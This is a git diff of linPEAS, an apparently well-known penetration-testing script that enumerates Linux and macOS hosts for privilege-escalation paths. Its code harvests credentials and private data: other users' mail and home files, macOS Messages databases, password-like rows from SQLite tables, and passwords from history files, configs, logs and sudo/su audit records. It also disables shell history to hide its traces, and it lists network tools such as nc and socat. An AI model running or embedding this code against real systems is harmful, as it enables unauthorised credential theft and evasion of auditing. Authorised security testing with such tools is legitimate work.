+lastWlogFolder="ImPOsSiBleeElastWlogFolder" +logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) +printf "%s\n" "$logfind" | while read log; do + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + fi + fi +done + +echo "" + +##-- IF) Files inside my home +print_2title "Files inside $HOME (limit 20)" +(ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found +echo "" + +##-- IF) Files inside /home +print_2title "Files inside others home (limit 20)" +(find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found +echo "" + +##-- IF) Mail applications +print_2title "Searching installed mail applications" +ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" +echo "" + +##-- IF) Mails +print_2title "Mails (limit 50)" +(find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found +echo "" + +##-- IF) Backup folders +print_2title "Backup folders" +printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; + ls -l "$b" 2>/dev/null && echo "" +done +echo "" + +##-- IF) Backup files +print_2title "Backup files (limited 100)" +backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) +printf "%s\n" "$backs" | head -n 100 | while read b ; do + if [ -r "$b" ]; then + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; + fi; +done +echo "" + +##-- IF) DB files +if [ "$MACPEAS" ]; then + print_2title "Reading messages database" + sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null + +fi +print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" +FILECMD="$(command -v file 2>/dev/null)" +if [ "$PSTORAGE_DATABASE" ]; then + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if [ "$FILECMD" ]; then + echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + else + echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + fi + done + SQLITEPYTHON="" + echo "" + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + if [ "$(command -v sqlite3 2>/dev/null)" ]; then + tables=$(sqlite3 $f ".tables" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then + SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) + tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + else + tables="" + fi + if [ "$tables" ] || [ "$DEBUG" ]; then + printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC + printf "%s\n" "$tables" | while read t; do + columns="" + # Search for credentials inside the table using sqlite3 + if [ -z "$SQLITEPYTHON" ]; then + columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") + # Search for credentials inside the table using python + else + columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) + fi + #Check found columns for interesting fields + INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") + if [ "$INTCOLUMN" ]; then + printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" + (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + fi + echo "" + done + fi + fi + done +fi +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Downloaded Files" + sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" +fi + +##-- IF) Web files +print_2title "Web files?(output limit)" +ls -alhR /var/www/ 2>/dev/null | head +ls -alhR /srv/www/htdocs/ 2>/dev/null | head +ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head +ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head +echo "" + +##-- IF) All hidden files +print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" +find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 +echo "" + +##-- IF) Readable files in /tmp, /var/tmp, bachups +print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" +filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) +printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done +echo "" + +##-- IF) Interesting writable files by ownership or all +if ! [ "$IAMROOT" ]; then + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$obmowbe" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -qE "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + echo "" +fi + +##-- IF) Interesting writable files by group +if ! [ "$IAMROOT" ]; then + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + for g in $(groups); do + iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + if [ "$iwfbg" ] || [ "$DEBUG" ]; then + printf " Group $GREEN$g:\n$NC"; + printf "%s\n" "$iwfbg" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -Eq "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + fi + done + echo "" +fi + +##-- IF) Passwords in history files +if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then + print_2title "Searching passwords in history files" + printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done + echo "" +fi + +##-- IF) Passwords in config PHP files +if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then + print_2title "Searching passwords in config PHP files" + printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done + echo "" +fi + +##-- IF) Passwords files in home +if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then + print_2title "Finding *password* or *credential* files in home (limit 70)" + (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found + echo "" +fi + +##-- IF) TTY passwords +print_2title "Checking for TTY (sudo/su) passwords in audit logs" +aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" +find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" +echo "" + +##-- IF) IPs inside logs +if [ "$DEBUG" ]; then + print_2title "Finding IPs inside logs (limit 70)" + (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 + echo "" +fi + +##-- IF) Passwords inside logs +print_2title "Finding passwords inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," +echo "" + +if [ "$DEBUG" ]; then + ##-- IF) Emails inside logs + print_2title "Finding emails inside logs (limit 70)" + (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" + echo "" +fi + + + + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Find possible files with passwords + print_2title "Finding passwords inside key folders (limit 70) - only PHP files" + intpwdfiles=$(timeout 150 find $HOMESEARCH /var/www /usr/local/www/ $backup_folders_row /tmp /etc /mnt /private -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null) + printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + print_2title "Finding passwords inside key folders (limit 70) - no PHP files" + printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + ##-- IF) Find possible files with passwords + print_2title "Finding possible password variables inside key folders (limit 140)" + timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + wait + echo "" + + ##-- IF) Find possible conf files with passwords + print_2title "Finding possible password in config files" + ppicf=$(find $HOMESEARCH /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + printf "%s\n" "$ppicf" | while read f; do + if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then + echo "$ITALIC $f$NC" + grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" + fi + done + echo "" + + ##-- IF) Find possible regexes + peass{REGEXES} +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_base.sh b/linPEAS/builder/linpeas_parts/linpeas_base.sh similarity index 55% rename from linPEAS/builder/linpeas_base.sh rename to linPEAS/builder/linpeas_parts/linpeas_base.sh index 06abb7d..73f2015 100755 --- a/linPEAS/builder/linpeas_base.sh +++ b/linPEAS/builder/linpeas_parts/linpeas_base.sh @@ -52,16 +52,16 @@ ITALIC="${C}[3m" if uname 2>/dev/null | grep -q 'Darwin' || /usr/bin/uname 2>/dev/null | grep -q 'Darwin'; then MACPEAS="1"; else MACPEAS=""; fi FAST="1" #By default stealth/fast mode SUPERFAST="" -NOTEXPORT="" DISCOVERY="" PORTS="" QUIET="" -CHECKS="SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles" +CHECKS="peass{CHECKS}" WAIT="" PASSWORD="" NOCOLOR="" -VERBOSE="" +DEBUG="" AUTO_NETWORK_SCAN="" +EXTRA_CHECKS="" THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")" [ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2 [ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2 @@ -70,14 +70,14 @@ HELP=$GREEN"Enumerate and search Privilege Escalation vectors. ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors. ${YELLOW}-h${BLUE} To show this message ${YELLOW}-q${BLUE} Do not show banner - ${YELLOW}-a${BLUE} All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly + ${YELLOW}-e${BLUE} Perform extra enumeration ${YELLOW}-s${BLUE} SuperFast (don't check some time consuming checks) - Stealth mode - ${YELLOW}-w${BLUE} Wait execution between big blocks - ${YELLOW}-n${BLUE} Do not export env variables related with history and do not check Internet connectivity + ${YELLOW}-a${BLUE} All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly + ${YELLOW}-w${BLUE} Wait execution between big blocks of checks ${YELLOW}-N${BLUE} Do not use colours - ${YELLOW}-v${BLUE} Verbose execution + ${YELLOW}-D${BLUE} Debug mode ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' - ${YELLOW}-o${BLUE} Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. + ${YELLOW}-o${BLUE} Only execute selected checks (peass{CHECKS}). Select a comma separated list. ${YELLOW}-L${BLUE} Force linpeas execution. ${YELLOW}-M${BLUE} Force macpeas execution. ${YELLOW}-d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 @@ -86,12 +86,11 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW}-t${BLUE} Automatic network scan (host discovery and port scanning) - This option writes to files $GREEN Notice${BLUE} that if you select some network action, no PE check will be performed$NC" -while getopts "h?asnd:p:i:P:qo:LMwNvt" opt; do +while getopts "h?asd:p:i:P:qo:LMwNDte" opt; do case "$opt" in h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;; - a) FAST="";; + a) FAST="";EXTRA_CHECKS="1";; s) SUPERFAST=1;; - n) NOTEXPORT=1;; d) DISCOVERY=$OPTARG;; p) PORTS=$OPTARG;; i) IP=$OPTARG;; @@ -102,8 +101,9 @@ while getopts "h?asnd:p:i:P:qo:LMwNvt" opt; do M) MACPEAS="1";; w) WAIT=1;; N) NOCOLOR="1";; - v) VERBOSE="1";; + D) DEBUG="1";; t) AUTO_NETWORK_SCAN="1";; + e) EXTRA_CHECKS="1";; esac done @@ -213,7 +213,7 @@ print_banner(){ } -print_support (){ +print_support () { printf """ ${GREEN}/---------------------------------------------------------------------------\\ | ${BLUE}Do you like PEASS?${GREEN} | @@ -510,7 +510,7 @@ profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh| knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com" -timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer" +timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer" commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" @@ -519,7 +519,7 @@ ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client6 dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.opensuse.CupsPkHelper.Mechanism" -CONTAINER_CMDS="docker lxc rkt kubectl podman runc" +USEFUL_SOFTWARE="authbind aws base64 ctr curl doas docker fetch g++ gcc gdb kubectl lxc make nc nc.traditional ncat netcat nmap perl php ping podman python python2 python2.6 python2.7 python3 python3.6 python3.7 rkt ruby runc socat sudo wget xterm" TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be possible." GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSystem|KernelVersion|ServerVersion" GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig" @@ -584,7 +584,7 @@ echo_no (){ } print_title(){ - if [ "$VERBOSE" ]; then + if [ "$DEBUG" ]; then END_T2_TIME=$(date +%s 2>/dev/null) if [ "$START_T2_TIME" ]; then TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) @@ -601,11 +601,37 @@ print_title(){ START_T1_TIME=$(date +%s 2>/dev/null) fi - printf ${BLUE}"════════════════════════════════════╣ $GREEN$1${BLUE} ╠════════════════════════════════════\n"$NC + title=$1 + title_len=$(echo $title | wc -c) + max_title_len=100 + rest_len=$((($max_title_len - $title_len) / 2)) + + printf ${BLUE} + for i in $(seq 1 $rest_len); do printf " "; done + printf "╔" + for i in $(seq 1 $title_len); do printf "═"; done; printf "═"; + printf "╗" + + echo "" + + for i in $(seq 1 $rest_len); do printf "═"; done + printf "╣ $GREEN${title}${BLUE} ╠" + for i in $(seq 1 $rest_len); do printf "═"; done + + echo "" + + printf ${BLUE} + for i in $(seq 1 $rest_len); do printf " "; done + printf "╚" + for i in $(seq 1 $title_len); do printf "═"; done; printf "═"; + printf "╝" + + printf $NC + echo "" } print_2title(){ - if [ "$VERBOSE" ]; then + if [ "$DEBUG" ]; then END_T2_TIME=$(date +%s 2>/dev/null) if [ "$START_T2_TIME" ]; then TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) @@ -864,139 +890,12 @@ discovery_port_scan (){ #---) Exporting history env variables (---# ########################################### -if ! [ "$NOTEXPORT" ]; then - unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH - export HISTFILE=/dev/null - export HISTSIZE=0 - export HISTFILESIZE=0 -fi +unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH +export HISTFILE=/dev/null +export HISTSIZE=0 +export HISTFILESIZE=0 -########################################### -#---------) Container functions (---------# -########################################### - -containerCheck() { - inContainer="" - containerType="$(echo_no)" - - # Are we inside docker? - if [ -f "/.dockerenv" ] || - grep "/docker/" /proc/1/cgroup -qa 2>/dev/null || - grep -qai docker /proc/self/cgroup 2>/dev/null || - [ "$(find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null)" ] ; then - - inContainer="1" - containerType="docker\n" - fi - - # Are we inside kubenetes? - if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null || - grep -qai kubepods /proc/self/cgroup 2>/dev/null; then - - inContainer="1" - if [ "$containerType" ]; then containerType="$containerType (kubernetes)\n" - else containerType="kubernetes\n" - fi - fi - - # Are we inside LXC? - if env | grep "container=lxc" -qa 2>/dev/null || - grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then - - inContainer="1" - containerType="lxc\n" - fi - - # Are we inside podman? - if env | grep -qa "container=podman" 2>/dev/null || - grep -qa "container=podman" /proc/1/environ 2>/dev/null; then - - inContainer="1" - containerType="podman\n" - fi - - # Check for other container platforms that report themselves in PID 1 env - if [ -z "$inContainer" ]; then - if grep -a 'container=' /proc/1/environ 2>/dev/null; then - inContainer="1" - containerType="$(grep -a 'container=' /proc/1/environ | cut -d= -f2)\n" - fi - fi -} - -inDockerGroup() { - DOCKER_GROUP="No" - if groups 2>/dev/null | grep -q '\bdocker\b'; then - DOCKER_GROUP="Yes" - fi -} - -checkDockerRootless() { - DOCKER_ROOTLESS="No" - if docker info 2>/dev/null|grep -q rootless; then - DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)" - fi -} - -enumerateDockerSockets() { - dockerVersion="$(echo_not_found)" - if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then - SEARCHED_DOCKER_SOCKETS="1" - for dock_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -w "$dock_sock" ]; then - echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g" - 